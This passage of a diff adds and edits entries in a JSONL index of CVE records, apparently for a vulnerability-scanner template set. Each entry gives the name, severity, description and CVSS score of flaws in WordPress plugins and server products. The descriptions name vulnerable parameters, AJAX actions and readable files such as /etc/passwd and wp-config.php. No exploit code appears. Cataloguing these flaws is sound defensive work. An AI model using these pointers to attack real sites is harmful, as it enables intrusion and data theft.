~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1..\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0653.yaml"} {"ID":"CVE-2022-0656","Info":{"Name":"uDraw \u003c3.3.3 - Local File Inclusion","Severity":"high","Description":"uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0656.yaml"} +{"ID":"CVE-2022-0658","Info":{"Name":"CommonsBooking \u003c 2.6.8 - SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0658.yaml"} {"ID":"CVE-2022-0660","Info":{"Name":"Microweber \u003c1.2.11 - Information Disclosure","Severity":"high","Description":"Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0660.yaml"} {"ID":"CVE-2022-0678","Info":{"Name":"Microweber \u003c1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0678.yaml"} {"ID":"CVE-2022-0679","Info":{"Name":"WordPress Narnoo Distributor \u003c=2.5.1 - Local File Inclusion","Severity":"critical","Description":"WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0679.yaml"} @@ -1429,22 +1524,25 @@ {"ID":"CVE-2022-0760","Info":{"Name":"WordPress Simple Link Directory \u003c7.7.2 - SQL injection","Severity":"critical","Description":"WordPress Simple Link Directory plugin before 7.7.2 contains a SQL injection vulnerability. The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action, available to unauthenticated and authenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0760.yaml"} {"ID":"CVE-2022-0769","Info":{"Name":"Users Ultra \u003c= 3.1.0 - SQL Injection","Severity":"critical","Description":"The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0769.yaml"} {"ID":"CVE-2022-0773","Info":{"Name":"Documentor \u003c= 1.5.3 - Unauthenticated SQL Injection","Severity":"critical","Description":"The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0773.yaml"} -{"ID":"CVE-2022-0776","Info":{"Name":"RevealJS postMessage \u003c4.3.0 - Cross-Site Scripting","Severity":"medium","Description":"RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0776.yaml"} +{"ID":"CVE-2022-0776","Info":{"Name":"RevealJS postMessage \u003c4.3.0 - Cross-Site Scripting","Severity":"medium","Description":"RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0776.yaml"} {"ID":"CVE-2022-0781","Info":{"Name":"WordPress Nirweb Support \u003c2.8.2 - SQL Injection","Severity":"critical","Description":"WordPress Nirweb support plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0781.yaml"} {"ID":"CVE-2022-0784","Info":{"Name":"WordPress Title Experiments Free \u003c9.0.1 - SQL Injection","Severity":"critical","Description":"WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0784.yaml"} {"ID":"CVE-2022-0785","Info":{"Name":"WordPress Daily Prayer Time \u003c2022.03.01 - SQL Injection","Severity":"critical","Description":"WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0785.yaml"} {"ID":"CVE-2022-0786","Info":{"Name":"WordPress KiviCare \u003c2.3.9 - SQL Injection","Severity":"critical","Description":"WordPress KiviCare plugin before 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0786.yaml"} +{"ID":"CVE-2022-0787","Info":{"Name":"Limit Login Attempts (Spam Protection) \u003c 5.1 - SQL Injection","Severity":"critical","Description":"The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0787.yaml"} {"ID":"CVE-2022-0788","Info":{"Name":"WordPress WP Fundraising Donation and Crowdfunding Platform \u003c1.5.0 - SQL Injection","Severity":"critical","Description":"WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0788.yaml"} +{"ID":"CVE-2022-0814","Info":{"Name":"Ubigeo de Peru \u003c 3.6.4 - SQL Injection","Severity":"critical","Description":"The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0814.yaml"} {"ID":"CVE-2022-0817","Info":{"Name":"WordPress BadgeOS \u003c=3.7.0 - SQL Injection","Severity":"critical","Description":"WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0817.yaml"} {"ID":"CVE-2022-0824","Info":{"Name":"Webmin \u003c1.990 - Improper Access Control","Severity":"high","Description":"Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-0824.yaml"} {"ID":"CVE-2022-0826","Info":{"Name":"WordPress WP Video Gallery \u003c=1.7.1 - SQL Injection","Severity":"critical","Description":"WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0826.yaml"} {"ID":"CVE-2022-0827","Info":{"Name":"WordPress Best Books \u003c=2.6.3 - SQL Injection","Severity":"critical","Description":"WordPress Best Books plugin through 2.6.3 is susceptible to SQL injection. The plugin does not sanitize and escape some parameters before using them in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0827.yaml"} {"ID":"CVE-2022-0846","Info":{"Name":"SpeakOut Email Petitions \u003c 2.14.15.1 - SQL Injection","Severity":"critical","Description":"The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0846.yaml"} -{"ID":"CVE-2022-0864","Info":{"Name":"UpdraftPlus \u003c 1.22.9 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-0864.yaml"} +{"ID":"CVE-2022-0864","Info":{"Name":"UpdraftPlus \u003c 1.22.9 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0864.yaml"} {"ID":"CVE-2022-0867","Info":{"Name":"WordPress ARPrice \u003c3.6.1 - SQL Injection","Severity":"critical","Description":"WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0867.yaml"} {"ID":"CVE-2022-0869","Info":{"Name":"nitely/spirit 0.12.3 - Open Redirect","Severity":"medium","Description":"Multiple Open Redirect in GitHub repository nitely/spirit prior to 0.12.3.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0869.yaml"} {"ID":"CVE-2022-0870","Info":{"Name":"Gogs \u003c0.12.5 - Server-Side Request Forgery","Severity":"medium","Description":"Gogs GitHub repository before 0.12.5 is susceptible to server-side request forgery. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0870.yaml"} {"ID":"CVE-2022-0885","Info":{"Name":"Member Hero \u003c=1.0.9 - Remote Code Execution","Severity":"critical","Description":"WordPress Member Hero plugin through 1.0.9 is susceptible to remote code execution. The plugin lacks authorization checks and does not validate the a request parameter in an AJAX action, allowing an attacker to call arbitrary PHP functions with no arguments. An attacker can thus execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0885.yaml"} +{"ID":"CVE-2022-0899","Info":{"Name":"Header Footer Code Manager \u003c 1.1.24 - Cross-Site Scripting","Severity":"medium","Description":"The Header Footer Code Manager WordPress plugin before 1.1.24 does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0899.yaml"} {"ID":"CVE-2022-0928","Info":{"Name":"Microweber \u003c 1.2.12 - Stored Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0928.yaml"} {"ID":"CVE-2022-0948","Info":{"Name":"WordPress Order Listener for WooCommerce \u003c3.2.2 - SQL Injection","Severity":"critical","Description":"WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0948.yaml"} {"ID":"CVE-2022-0949","Info":{"Name":"WordPress Stop Bad Bots \u003c6.930 - SQL Injection","Severity":"critical","Description":"WordPress Stop Bad Bots plugin before 6.930 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0949.yaml"} @@ -1476,9 +1574,10 @@ {"ID":"CVE-2022-1595","Info":{"Name":"WordPress HC Custom WP-Admin URL \u003c=1.4 - Admin Login URL Disclosure","Severity":"medium","Description":"WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1595.yaml"} {"ID":"CVE-2022-1597","Info":{"Name":"WordPress WPQA \u003c5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1597.yaml"} {"ID":"CVE-2022-1598","Info":{"Name":"WordPress WPQA \u003c5.5 - Improper Access Control","Severity":"medium","Description":"WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1598.yaml"} -{"ID":"CVE-2022-1609","Info":{"Name":"The School Management \u003c 9.9.7 - Remote Code Execution","Severity":"critical","Description":"The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2022/CVE-2022-1609.yaml"} +{"ID":"CVE-2022-1609","Info":{"Name":"The School Management \u003c 9.9.7 - Remote Code Execution","Severity":"critical","Description":"The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-1609.yaml"} {"ID":"CVE-2022-1713","Info":{"Name":"Drawio \u003c18.0.4 - Server-Side Request Forgery","Severity":"high","Description":"Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-1713.yaml"} {"ID":"CVE-2022-1724","Info":{"Name":"WordPress Simple Membership \u003c4.1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Simple Membership plugin before 4.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape parameters before outputting them back in AJAX actions.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1724.yaml"} +{"ID":"CVE-2022-1756","Info":{"Name":"Newsletter \u003c 7.4.5 - Cross-Site Scripting","Severity":"medium","Description":"The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1756.yaml"} {"ID":"CVE-2022-1768","Info":{"Name":"WordPress RSVPMaker \u003c=9.3.2 - SQL Injection","Severity":"high","Description":"WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-1768.yaml"} {"ID":"CVE-2022-1815","Info":{"Name":"Drawio \u003c18.1.2 - Server-Side Request Forgery","Severity":"high","Description":"Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-1815.yaml"} {"ID":"CVE-2022-1883","Info":{"Name":"Terraboard \u003c2.2.0 - SQL Injection","Severity":"high","Description":"Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-1883.yaml"} @@ -1497,18 +1596,21 @@ {"ID":"CVE-2022-21587","Info":{"Name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","Severity":"critical","Description":"Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-21587.yaml"} {"ID":"CVE-2022-21661","Info":{"Name":"WordPress \u003c5.8.3 - SQL Injection","Severity":"high","Description":"WordPress before 5.8.3 is susceptible to SQL injection through multiple plugins or themes due to improper sanitization in WP_Query, An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-21661.yaml"} {"ID":"CVE-2022-21705","Info":{"Name":"October CMS - Remote Code Execution","Severity":"high","Description":"October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-21705.yaml"} +{"ID":"CVE-2022-2174","Info":{"Name":"microweber 1.2.18 - Cross-site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2174.yaml"} {"ID":"CVE-2022-2185","Info":{"Name":"GitLab CE/EE - Remote Code Execution","Severity":"high","Description":"GitLab CE/EE 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 is susceptible to remote code execution. An authenticated user authorized to import projects can import a maliciously crafted project, thus possibly being able to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-2185.yaml"} {"ID":"CVE-2022-2187","Info":{"Name":"WordPress Contact Form 7 Captcha \u003c0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Contact Form 7 Captcha plugin before 0.1.2 contains a reflected cross-site scripting vulnerability. It does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2187.yaml"} -{"ID":"CVE-2022-2219","Info":{"Name":"Unyson \u003c 2.7.27 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-2219.yaml"} +{"ID":"CVE-2022-2219","Info":{"Name":"Unyson \u003c 2.7.27 - Cross Site Scripting","Severity":"high","Description":"The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-2219.yaml"} {"ID":"CVE-2022-22242","Info":{"Name":"Juniper Web Device Manager - Cross-Site Scripting","Severity":"medium","Description":"Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-22242.yaml"} {"ID":"CVE-2022-22536","Info":{"Name":"SAP Memory Pipes (MPI) Desynchronization","Severity":"critical","Description":"SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-22536.yaml"} {"ID":"CVE-2022-22733","Info":{"Name":"Apache ShardingSphere ElasticJob-UI privilege escalation","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-22733.yaml"} +{"ID":"CVE-2022-22897","Info":{"Name":"PrestaShop Ap Pagebuilder \u003c= 2.4.4 SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22897.yaml"} {"ID":"CVE-2022-2290","Info":{"Name":"Trilium \u003c0.52.4 - Cross-Site Scripting","Severity":"medium","Description":"Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2290.yaml"} {"ID":"CVE-2022-22947","Info":{"Name":"Spring Cloud Gateway Code Injection","Severity":"critical","Description":"Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-22947.yaml"} {"ID":"CVE-2022-22954","Info":{"Name":"VMware Workspace ONE Access - Server-Side Template Injection","Severity":"critical","Description":"VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22954.yaml"} {"ID":"CVE-2022-22963","Info":{"Name":"Spring Cloud - Remote Code Execution","Severity":"critical","Description":"Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22963.yaml"} {"ID":"CVE-2022-22965","Info":{"Name":"Spring - Remote Code Execution","Severity":"critical","Description":"Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22965.yaml"} {"ID":"CVE-2022-22972","Info":{"Name":"VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass","Severity":"critical","Description":"VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22972.yaml"} +{"ID":"CVE-2022-23102","Info":{"Name":"SINEMA Remote Connect Server \u003c V2.0 - Open Redirect","Severity":"medium","Description":"A vulnerability has been identified in SINEMA Remote Connect Server (All versions \u003c V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-23102.yaml"} {"ID":"CVE-2022-23131","Info":{"Name":"Zabbix - SAML SSO Authentication Bypass","Severity":"critical","Description":"When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-23131.yaml"} {"ID":"CVE-2022-23134","Info":{"Name":"Zabbix Setup Configuration Authentication Bypass","Severity":"medium","Description":"After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-23134.yaml"} {"ID":"CVE-2022-2314","Info":{"Name":"WordPress VR Calendar \u003c=2.3.2 - Remote Code Execution","Severity":"critical","Description":"WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-2314.yaml"} @@ -1529,6 +1631,7 @@ {"ID":"CVE-2022-24112","Info":{"Name":"Apache APISIX - Remote Code Execution","Severity":"critical","Description":"A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24112.yaml"} {"ID":"CVE-2022-24124","Info":{"Name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","Severity":"high","Description":"Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24124.yaml"} {"ID":"CVE-2022-24129","Info":{"Name":"Shibboleth OIDC OP \u003c3.0.4 - Server-Side Request Forgery","Severity":"high","Description":"The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2022/CVE-2022-24129.yaml"} +{"ID":"CVE-2022-2414","Info":{"Name":"FreeIPA - XML Entity Injection","Severity":"high","Description":"Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP 